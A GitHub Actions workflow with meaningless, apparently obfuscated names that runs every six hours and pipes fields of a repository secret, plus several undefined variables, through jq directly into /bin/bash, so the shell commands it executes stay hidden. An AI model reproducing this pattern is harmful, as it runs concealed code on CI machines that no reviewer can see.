name: zhaojinan7890

on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaojinan7890
        env:
          lmq890: ${{ secrets.lmq890 }}
        run: |
          echo $lmq890 | jq -r .zldu513 | /bin/bash
          echo $gyndl1845 | jq -r .jvqx62251 | /bin/bash
          echo $bv68 | jq -r .akk174 | /bin/bash
          echo $bbd22 | jq -r .ch12138 | /bin/bash
          echo $imeb36 | jq -r .do0 | /bin/bash
          echo $gfdo97 | jq -r .yok4254 | /bin/bash
          echo $n4562 | jq -r .hgn090 | /bin/bash
          echo $t8580 | jq -r .fiumq19966 | /bin/bash
          echo $ieb2564 | jq -r .bkzq046 | /bin/bash

